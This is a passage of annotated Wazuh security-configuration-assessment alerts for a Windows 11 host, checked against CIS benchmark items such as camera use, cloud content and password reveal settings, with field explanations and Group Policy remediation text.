rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.12.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2501545
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Kind of SCA event: 'check' is a single benchmark check result (this alert); 'summary' carries the pass/fail totals for the whole scan. What the check actually inspected is in data.sca.check.registry below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26286
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Allow Use of Camera' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether the use of Camera devices on the machine are permitted. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Cameras in a high security environment can pose serious privacy and data exfiltration risks - they should be disabled to help mitigate that risk.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Camera\Allow Use of Camera. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Camera.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer).
Benchmark‑recommended fix text (here from CIS, applied via Group Policy) – copy‑paste for hardening tickets. Confirm the ADMX template named in the note is present in the central store before expecting the GP path to exist.

data.sca.check.compliance.cis:  18.9.12.1
CIS benchmark section this single check maps to; rule.cis above is derived from it.

data.sca.check.compliance.pci_dss:  2.2.5
PCI DSS requirement this single check maps to (merged into rule.pci_dss above).

data.sca.check.compliance.tsc:  CC6.3
SOC 2 Trust Services Criteria this single check maps to (merged into rule.tsc above).

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Camera']
Registry key(s) the check inspected; the result below says whether the expected policy value was found under it. Policies keys are written by Group Policy, so fix failures through the GP path above, not by hand‑editing the key.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud optimized content' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud optimized content' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.617+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.617+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh rule level 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad. For SCA alerts the level encodes the check result, not observed behaviour: 7 = check failed (rule 19007), 3 = check passed (rule 19008).

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud optimized content' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.14.2']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2504389
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Kind of SCA event: 'check' is a single benchmark check result (this alert); 'summary' carries the pass/fail totals for the whole scan. What the check actually inspected is in data.sca.check.registry below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26288
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off cloud optimized content' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting turns off cloud optimized content in all Windows experiences. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Due to privacy concerns, data should never be sent to any 3rd party since this data could contain sensitive information.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off cloud optimized content. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 20H2 Administrative Templates (or newer).
Benchmark‑recommended fix text (here from CIS, applied via Group Policy) – copy‑paste for hardening tickets. Confirm the ADMX template named in the note is present in the central store before expecting the GP path to exist.

data.sca.check.compliance.cis:  18.9.14.2
CIS benchmark section this single check maps to; rule.cis above is derived from it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent']
Registry key(s) the check inspected; the result below says whether the expected policy value was found under it. Policies keys are written by Group Policy, so fix failures through the GP path above, not by hand‑editing the key.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.617+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.617+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh rule level 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad. For SCA alerts the level encodes the check result, not observed behaviour: 7 = check failed (rule 19007), 3 = check passed (rule 19008).

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.14.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2507226
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Kind of SCA event: 'check' is a single benchmark check result (this alert); 'summary' carries the pass/fail totals for the whole scan. What the check actually inspected is in data.sca.check.registry below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26287
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off cloud consumer account state content' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines whether cloud consumer account state content is allowed in all Windows experiences. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The use of consumer accounts in an enterprise managed environment is not good security practice as it could lead to possible data leakage.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off cloud consumer account state content. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer).
Benchmark‑recommended fix text (here from CIS, applied via Group Policy) – copy‑paste for hardening tickets. Confirm the ADMX template named in the note is present in the central store before expecting the GP path to exist.

data.sca.check.compliance.cis:  18.9.14.1
CIS benchmark section this single check maps to; rule.cis above is derived from it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent']
Registry key(s) the check inspected; the result below says whether the expected policy value was found under it. Policies keys are written by Group Policy, so fix failures through the GP path above, not by hand‑editing the key.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.628+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.628+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh rule level 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad. For SCA alerts the level encodes the check result, not observed behaviour: 7 = check failed (rule 19007), 3 = check passed (rule 19008).

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.14.3']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2510242
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Kind of SCA event: 'check' is a single benchmark check result (this alert); 'summary' carries the pass/fail totals for the whole scan. What the check actually inspected is in data.sca.check.registry below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26289
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off Microsoft consumer experiences' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting turns off experiences that help consumers make the most of their devices and Microsoft account. The recommended state for this setting is: Enabled. Note: Per Microsoft TechNet, this policy setting only applies to Windows 10 Enterprise and Windows 10 Education editions.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Having apps silently install in an enterprise managed environment is not good security practice - especially if the apps send data back to a 3rd party.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Cloud Content\Turn off Microsoft consumer experiences. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CloudContent.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer).
Benchmark‑recommended fix text (here from CIS, applied via Group Policy) – copy‑paste for hardening tickets. Confirm the ADMX template named in the note is present in the central store before expecting the GP path to exist.

data.sca.check.compliance.cis:  18.9.14.3
CIS benchmark section this single check maps to; rule.cis above is derived from it.

data.sca.check.compliance.pci_dss:  4.1
PCI DSS requirement this single check maps to (merged into rule.pci_dss above).

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
HIPAA safeguards this single check maps to (merged into rule.hipaa above).

data.sca.check.compliance.nist_800_53:  SC.8
NIST SP 800‑53 control this single check maps to (merged into rule.nist_800_53 above).

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
SOC 2 Trust Services Criteria this single check maps to (merged into rule.tsc above).

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CloudContent']
Registry key(s) the check inspected; the result below says whether the expected policy value was found under it. This is the third failed check under the same CloudContent key in this scan (with 18.9.14.1 and 18.9.14.2), so one Group Policy edit covers all three. Policies keys are written by Group Policy, so fix failures through the GP path above, not by hand‑editing the key.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.644+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.644+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh rule level 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad. For SCA alerts the level encodes the check result, not observed behaviour: 7 = check failed (rule 19007), 3 = check passed (rule 19008).

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.15.1']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2513822
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Kind of SCA event: 'check' is a single benchmark check result (this alert); 'summary' carries the pass/fail totals for the whole scan. What the check actually inspected is in data.sca.check.registry below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26290
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Require pin for pairing' is set to 'Enabled: First Time' OR 'Enabled: Always'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether or not a PIN is required for pairing to a wireless display device. The recommended state for this setting is: Enabled: First Time OR Enabled: Always.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If this setting is not configured or disabled then a PIN would not be required when pairing wireless display devices to the system, increasing the risk of unauthorized use.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: First Time OR Enabled: Always: Computer Configuration\Policies\Administrative Templates\Windows Components\Connect\Require pin for pairing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WirelessDisplay.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer). The new Choose one of the following actions sub-option was later added as of the Windows 10 Release 1809 Administrative Templates. Choosing Enabled in the older templates is the equivalent of choosing Enabled: First Time in the newer templates.
Benchmark‑recommended fix text (here from CIS, applied via Group Policy) – copy‑paste for hardening tickets. Confirm the ADMX template named in the note is present in the central store before expecting the GP path to exist.

data.sca.check.compliance.cis:  18.9.15.1
CIS benchmark section this single check maps to; rule.cis above is derived from it.

data.sca.check.compliance.pci_dss:  4.1
PCI DSS requirement this single check maps to (merged into rule.pci_dss above).

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
HIPAA safeguards this single check maps to (merged into rule.hipaa above).

data.sca.check.compliance.nist_800_53:  SC.8
NIST SP 800‑53 control this single check maps to (merged into rule.nist_800_53 above).

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
SOC 2 Trust Services Criteria this single check maps to (merged into rule.tsc above).

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Connect']
Registry key(s) the check inspected; the result below says whether the expected policy value was found under it. Policies keys are written by Group Policy, so fix failures through the GP path above, not by hand‑editing the key.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not display the password reveal button' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not display the password reveal button' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.660+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.660+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh rule level 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad. For SCA alerts the level encodes the check result, not observed behaviour: 7 = check failed (rule 19007), 3 = check passed (rule 19008).

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not display the password reveal button' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.2.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.16.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2517794
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Kind of SCA event: 'check' is a single benchmark check result (this alert); 'summary' carries the pass/fail totals for the whole scan. What the check actually inspected is in data.sca.check.registry below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26291
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Do not display the password reveal button' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to configure the display of the password reveal button in password entry user experiences. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  This is a useful feature when entering a long and complex password, especially when using a touchscreen. The potential risk is that someone else may see your password while surreptitiously observing your screen.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Credential User Interface\Do not display the password reveal button. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredUI.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Benchmark‑recommended fix text (here from CIS, applied via Group Policy) – copy‑paste for hardening tickets. Confirm the ADMX template named in the note is present in the central store before expecting the GP path to exist.

data.sca.check.compliance.cis:  18.9.16.1
CIS benchmark section this single check maps to; rule.cis above is derived from it.

data.sca.check.compliance.pci_dss:  8.2.1
PCI DSS requirement this single check maps to (merged into rule.pci_dss above).

data.sca.check.compliance.tsc:  CC6.1
SOC 2 Trust Services Criteria this single check maps to (merged into rule.tsc above).

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CredUI']
Registry key(s) the check inspected; the result below says whether the expected policy value was found under it. Policies keys are written by Group Policy, so fix failures through the GP path above, not by hand‑editing the key.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:50:09.675+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.675+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh rule level 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad. For SCA alerts the level encodes the check result, not observed behaviour: 7 = check failed (rule 19007), 3 = check passed (rule 19008).

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enumerate administrator accounts on elevation' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.2.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.16.2']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2521028
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Kind of SCA event: 'check' is a single benchmark check result (this alert); 'summary' carries the pass/fail totals for the whole scan. What the check actually inspected is in data.sca.check.registry below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
